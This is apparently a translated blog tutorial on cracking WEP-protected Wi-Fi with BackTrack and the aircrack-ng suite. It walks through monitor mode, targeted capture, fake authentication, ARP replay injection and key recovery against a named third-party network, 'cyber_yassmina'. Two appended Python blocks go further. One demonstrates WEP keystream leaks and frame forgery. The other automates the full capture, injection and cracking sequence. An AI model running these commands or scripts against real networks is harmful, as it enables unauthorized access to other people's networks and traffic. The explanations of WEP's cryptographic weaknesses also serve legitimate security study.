BackTrack - Tutorial - Videos: Crack WEP

Crack a WEP key!

Very good tutorial.
Computer engineering student at SUPINFO Casablanca since 2009, specialized technician in computer systems and networks.
One of the biggest fans of new technology, and one of the Moroccan Geeks!

The globalization of information and of internet use has brought a degree of freedom and independence, and has led to new concepts and technologies that make daily life easier: thanks to Wi-Fi we no longer depend on a fixed PC or on cables to connect to the internet.

Wireless LAN (802.11), commonly called WiFi ("Wireless Fidelity"), fits the OSI model like wired Ethernet does: 802.11 specifies the physical layer and the MAC sublayer of the data link layer, the difference being that it carries frames over radio waves instead of cables.

Wireless networks are exploding: they are installed in cafes, businesses, government offices, at the neighbor's and even at the corner grocer's! Some are accessible without any protection (open, shown as OPN by airodump-ng); others require a passphrase or a hexadecimal key and are protected by WEP, WPA or WPA-PSK.

Each protocol has strengths and weaknesses, and the choice depends on the use and on how critical the data transmitted over the network is. In a business, for example, WPA-PSK is preferable to WEP because it provides a much higher level of protection: cracking it takes far longer, requires capturing an authentication handshake and a dictionary attack on the passphrase, and only succeeds if the passphrase is in the dictionary.


WEP (Wired Equivalent Privacy) uses the RC4 stream cipher for confidentiality and a CRC-32 checksum (the ICV) for integrity. Neither choice holds up: the way RC4 is keyed leaks information about the secret key through the per-frame IV, which is what aircrack-ng exploits, and CRC-32 is linear, so it is a transmission-error check rather than a cryptographic integrity check.

64-bit WEP uses a 40-bit secret key and a 24-bit initialization vector (IV); together they form the 64-bit RC4 key. The IV is sent in clear in every frame and only has 2^24 = 16,777,216 possible values, so on a busy network it repeats.

The 128-bit version uses a 104-bit secret key, entered as 13 ASCII characters or 26 hexadecimal digits (each pair of hexadecimal digits is 8 bits: 13 * 8 = 104 bits), plus the same 24-bit IV.

For 256-bit WEP, 24 bits are reserved for the initialization vector and 232 bits for the secret key, usually entered as 58 hexadecimal digits (58 * 4 = 232 bits; 232 + 24 = 256 bits).
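The paragraphs above describe how the RC4 key is assembled and that CRC-32 provides the integrity check. The following example, added here and not part of the original tutorial, implements the WEP encapsulation in pure Python and uses it to show three consequences of that design: two frames sent under the same IV leak the XOR of their plaintexts, the predictable LLC/SNAP header at the start of every data frame gives away the first keystream bytes (the input the key-recovery attacks in aircrack-ng start from), and an encrypted frame can be modified without the key while its ICV still verifies. The key, IV and frame contents are constructed values, not captured traffic.

```python
# Added example (not from the tutorial): a minimal WEP encapsulation used to
# show why RC4 + CRC-32 with a 24-bit IV fails. All values are constructed.
import zlib

def rc4(key: bytes, length: int) -> bytes:
    """Produce `length` bytes of RC4 keystream for `key` (KSA then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")

def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV (in clear) || RC4_{IV||key}(plaintext || ICV).
    Secret key sizes 5/13/29 bytes = 40/104/232 bits (64/128/256-bit WEP)."""
    assert len(iv) == 3 and len(wep_key) in (5, 13, 29)
    payload = plaintext + icv(plaintext)
    ks = rc4(iv + wep_key, len(payload))
    return iv + bytes(a ^ b for a, b in zip(payload, ks))

def wep_decrypt(wep_key: bytes, body: bytes):
    """Return (plaintext, icv_ok); the receiver's check is just a CRC compare."""
    iv, ct = body[:3], body[3:]
    ks = rc4(iv + wep_key, len(ct))
    pt = bytes(a ^ b for a, b in zip(ct, ks))
    return pt[:-4], pt[-4:] == icv(pt[:-4])

def keystream_reuse_leak(wep_key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so C1 ^ C2 == P1 ^ P2.
    Returns what an eavesdropper learns without the key (P1 ^ P2)."""
    c1 = wep_encrypt(wep_key, iv, p1)[3:]
    c2 = wep_encrypt(wep_key, iv, p2)[3:]
    n = min(len(p1), len(p2))
    return bytes(a ^ b for a, b in zip(c1[:n], c2[:n]))

# LLC/SNAP header that starts every WEP-encrypted IP frame (known plaintext).
SNAP = bytes.fromhex("aaaa030000000800")

def recover_keystream_prefix(body: bytes, known: bytes = SNAP) -> bytes:
    """Ciphertext XOR known plaintext = the first keystream bytes for this IV.
    Collecting (IV, keystream prefix) pairs from many frames is what the
    statistical key-recovery attacks in aircrack-ng work from."""
    return bytes(a ^ b for a, b in zip(body[3:3 + len(known)], known))

def flip_without_key(body: bytes, delta: bytes) -> bytes:
    """Turn an encrypted frame for P into one for P ^ delta with a valid ICV.
    CRC-32 is affine over GF(2): crc(P ^ d) == crc(P) ^ crc(d) ^ crc(0...0),
    so XORing crc(d) ^ crc(zeros) into the encrypted ICV fixes it up."""
    iv, ct = body[:3], body[3:]
    n = len(ct) - 4                           # plaintext length
    d = delta.ljust(n, b"\x00")[:n]
    icv_delta = (zlib.crc32(d) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    mask = d + icv_delta
    return iv + bytes(a ^ b for a, b in zip(ct, mask))

# Constructed demo values (not a real key or capture)
KEY64 = bytes.fromhex("0123456789")           # 40-bit secret of a 64-bit WEP key
IV = bytes.fromhex("0a0b0c")
P1 = b"GET /index.html HTTP/1.0"
P2 = SNAP + b"who-has?"

if __name__ == "__main__":
    body = wep_encrypt(KEY64, IV, P1)
    print("round trip:", wep_decrypt(KEY64, body))
    print("P1 ^ P2 leaked by IV reuse:", keystream_reuse_leak(KEY64, IV, P1, P2).hex())
    print("keystream prefix:", recover_keystream_prefix(wep_encrypt(KEY64, IV, P2)).hex())
    # 0x17,0x10 turn "GE" into "PU": the request becomes a PUT, ICV still valid
    print("forged:", wep_decrypt(KEY64, flip_without_key(body, b"\x17\x10")))
```

The forgery works because the receiver only checks that the decrypted CRC matches; a real MAC keyed with the secret key (as in WPA's MIC) would reject the modified frame.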

The cracking of WEP:

Cracking a WEP key starts with getting the necessary tools and positioning yourself close enough to the access point: a good signal means faster packet capture, which speeds up the whole process.

The main tool is Aircrack-ng, available in the BackTrack 4 distribution and in all security-oriented distributions, and also on Windows, provided your wireless card and its driver support monitor mode (and, for the attacks below, packet injection).

Drivers for many of the wireless cards on the market are built into BackTrack, but not all of them support monitor mode, as is the case for the Broadcom BCM4310 used in the demonstration.

To work around this, recompiling the kernel and upgrading to a newer version are needed.

Besides aircrack-ng itself, you need airmon-ng, which enables monitor mode, airodump-ng, which captures packets, and aireplay-ng, which launches the fake authentication and ARP request replay attacks; all three are part of the Aircrack-ng suite and are included by default in BackTrack.

PS: for owners of the Alfa036AH USB Wi-Fi card, monitor mode was enabled automatically by running airodump-ng directly on the interface.

Replace "wifi0" with "wlan0" for the Alfa036AH USB card.

ex: airodump-ng -c 1-11 -w Lapampa wlan0

This scans channels 1 to 11 and writes the capture to Lapampa-01.cap. Channels 1 to 11 are the North American allocation; in France, as in the rest of Europe, channels 1 to 13 are allowed, so use -c 1-13 there or you will miss networks on channels 12 and 13.

BackTrack alone does not crack WEP: you must also be within range of the network you want to crack, to speed up the process,

and you must be patient, because even with a strong signal (PWR close to 0) collecting enough packets and cracking can take anywhere from 3 minutes to an hour or more.

The PWR column shows the signal strength of each access point (network): the value is negative and the closer it is to 0, the stronger the signal; a constant -1 means the driver does not report signal levels.

The cracking:

The first step in the cracking process is to put the wireless card into monitor mode with airmon-ng and check that it worked:

A new logical interface named mon0 is created.

Then run airodump-ng on the mon0 interface to listen and detect the available wireless networks.

Once launched, it lists all the networks in range as follows:

The target of our operation will be the network "cyber_yassmina" protected by WEP.

3 - Open a new shell and type the following command:

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

In our case, the command is:

airodump-ng -c 11 -w yasmina --bssid 00:18:6E:08:06:BF mon0

The BSSID is the MAC address of the access point (wireless router), shown in the first column of the airodump-ng output.

The output is similar to that of the previous command, except that only the packets of the network "cyber_yassmina" are captured, and they are written to the file yasmina-01.cap.

4 - Once the capture command is running, leave that shell open and open another one to perform a fake authentication with the router. This step is required before the injection attack that follows, which is the key to cracking WEP: the access point drops frames from stations that are not associated.

Fake authentication is simple:

aireplay-ng -1 0 -a (bssid) -h (attacker mac) -e (essid) (interface)

The command looks like this:

aireplay-ng -1 0 -a 00:18:6E:08:06:BF -h 00:11:22:33:44:55 -e cyber_yasmina mon0

-1: selects the fake authentication attack.

0: reassociation timing in seconds; 0 means a single authentication attempt.

-a: the BSSID (MAC address of the router).

-h: the attacker's MAC address, which the access point will then consider authenticated. It must be the real MAC address of the wireless card (or the card's MAC must first be changed to match, for example with macchanger), otherwise the access point ignores the injected frames.

-e: the network name (ESSID), exactly as airodump-ng displays it.

If you see "Association successful :-)" with the little smiley, you are authenticated on the router.

5 - After the fake authentication, another command must be run: the ARP request replay attack. It waits for an ARP request on the network and re-injects it over and over, so that the access point answers with a stream of new encrypted frames, each carrying a new IV.

aireplay-ng -3 -b (bssid) -h (attacker mac) (interface)

The command looks like this:

aireplay-ng -3 -b 00:18:6E:08:06:BF -h 00:11:22:33:44:55 mon0

-3: selects the ARP request replay attack.

-b: the BSSID (MAC address of the router).

-h: the attacker's MAC address, the same one used for the fake authentication.

6 - Go back to the shell where the capture is running: you will notice that the #Data column is increasing.

The value of this column is very important because it counts the captured data packets (unique IVs); as a rule of thumb it takes about 10,000 to crack a 64-bit WEP key,

more than 40,000 for a 128-bit key and over 100,000 for 256-bit WEP. These are rough figures: aircrack-ng can be started before they are reached, and if it fails it retries automatically as more IVs arrive in the capture file.

7 - Once the required packets have been captured, the cracking can be done.

For this we use the file in which airodump-ng stored the captured data: it is named after the -w prefix (yasmina) followed by a sequence number, with the extension .cap.

aircrack-ng -b (bssid) (file-name-01.cap)

The command needed in our case is:

aircrack-ng -b 00:18:6E:08:06:BF yasmina-01.cap

It only remains to copy the key that aircrack-ng prints after "KEY FOUND!", without the colons (:), and paste it into the password prompt when connecting to the network.
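Steps 1 to 7 above are typed by hand into several shells. The example below, added here and not part of the original tutorial, drives the same sequence from Python and takes the "is #Data high enough yet?" decision from the CSV file that airodump-ng writes next to the .cap (yasmina-01.csv for -w yasmina). The column names follow airodump-ng's CSV header; the sample rows, the interface name and the attacker MAC 00:11:22:33:44:55 are constructed values, not a real capture, and the IV thresholds are the rule-of-thumb figures quoted in step 6.

```python
# Added example, not part of the tutorial: the tutorial's procedure driven
# from Python. Sample CSV rows, interface and MAC addresses are constructed.
import csv
import io
import subprocess
import time

# Rough IV counts the tutorial quotes per key size (the #Data / "# IV" column).
IV_NEEDED = {64: 10_000, 128: 40_000, 256: 100_000}

# Constructed sample of <prefix>-01.csv: an access-point table, a blank line,
# then a station table. Only the AP table is used here.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:18:6E:08:06:BF, 2009-11-20 21:02:11, 2009-11-20 21:40:05, 11,  54, WEP , WEP, , -45,  1204,  12345,   0.  0.  0.  0,  14, cyber_yassmina,
00:1A:2B:3C:4D:5E, 2009-11-20 21:02:13, 2009-11-20 21:40:05,  6,  54, WPA2, CCMP, PSK, -71,   980,      0,   0.  0.  0.  0,   7, Lapampa,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2009-11-20 21:10:02, 2009-11-20 21:40:05, -30,  1500, 00:18:6E:08:06:BF,
"""

def parse_airodump_csv(text):
    """Return the access-point rows of an airodump-ng CSV as dicts keyed by
    the header names ("BSSID", "Privacy", "# IV", "ESSID", ...)."""
    ap_table = text.replace("\r\n", "\n").strip().split("\n\n")[0]
    rows = [[cell.strip() for cell in row]
            for row in csv.reader(io.StringIO(ap_table), skipinitialspace=True)
            if row]
    if not rows:                      # file not written yet, or empty
        return []
    header, body = rows[0], rows[1:]
    # An ESSID containing a comma would shift the columns; such rows are skipped.
    return [dict(zip(header, row)) for row in body if len(row) == len(header)]

def find_wep_targets(aps):
    """Only WEP networks are candidates for this procedure."""
    return [ap for ap in aps if ap["Privacy"].startswith("WEP")]

def iv_count(aps, bssid):
    """Captured unique IVs for one BSSID (what airodump-ng shows as #Data)."""
    for ap in aps:
        if ap["BSSID"].lower() == bssid.lower():
            return int(ap["# IV"])
    return 0

def ready_to_crack(aps, bssid, key_bits=64):
    """True once the rule-of-thumb IV count for the assumed key size is reached."""
    return iv_count(aps, bssid) >= IV_NEEDED[key_bits]

def commands(bssid, essid, channel, prefix, iface, attacker_mac):
    """The tutorial's four command lines as argv lists; airodump-ng -w <prefix>
    creates <prefix>-01.cap (and <prefix>-01.csv)."""
    return {
        "capture":   ["airodump-ng", "-c", str(channel), "-w", prefix, "--bssid", bssid, iface],
        "fakeauth":  ["aireplay-ng", "-1", "0", "-a", bssid, "-h", attacker_mac, "-e", essid, iface],
        "arpreplay": ["aireplay-ng", "-3", "-b", bssid, "-h", attacker_mac, iface],
        "crack":     ["aircrack-ng", "-b", bssid, f"{prefix}-01.cap"],
    }

if __name__ == "__main__":
    # Constructed parameters; attacker_mac must be the card's real MAC address.
    bssid, essid, chan, prefix, iface = "00:18:6E:08:06:BF", "cyber_yasmina", 11, "yasmina", "mon0"
    cmd = commands(bssid, essid, chan, prefix, iface, "00:11:22:33:44:55")
    subprocess.run(["airmon-ng", "start", "wlan0"], check=True)   # step 1: creates mon0
    capture = subprocess.Popen(cmd["capture"])                     # step 3
    subprocess.run(cmd["fakeauth"])                                # step 4
    replay = subprocess.Popen(cmd["arpreplay"])                    # step 5
    try:
        while True:                                                # step 6
            try:
                with open(f"{prefix}-01.csv", errors="replace") as f:
                    aps = parse_airodump_csv(f.read())
            except FileNotFoundError:
                aps = []
            if ready_to_crack(aps, bssid, key_bits=64):
                break
            time.sleep(10)
    finally:
        replay.terminate()
        capture.terminate()
    subprocess.run(cmd["crack"])                                   # step 7
```

The threshold check assumes a 64-bit key; if aircrack-ng fails, leave the capture and replay running and let it retry with more IVs rather than restarting from scratch.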


Videos... Crack WEP: automatic method for beginners,
with SpoonWep2: crack_wep_auto_sans_station_spoonwep_2_backtrack_3_final/

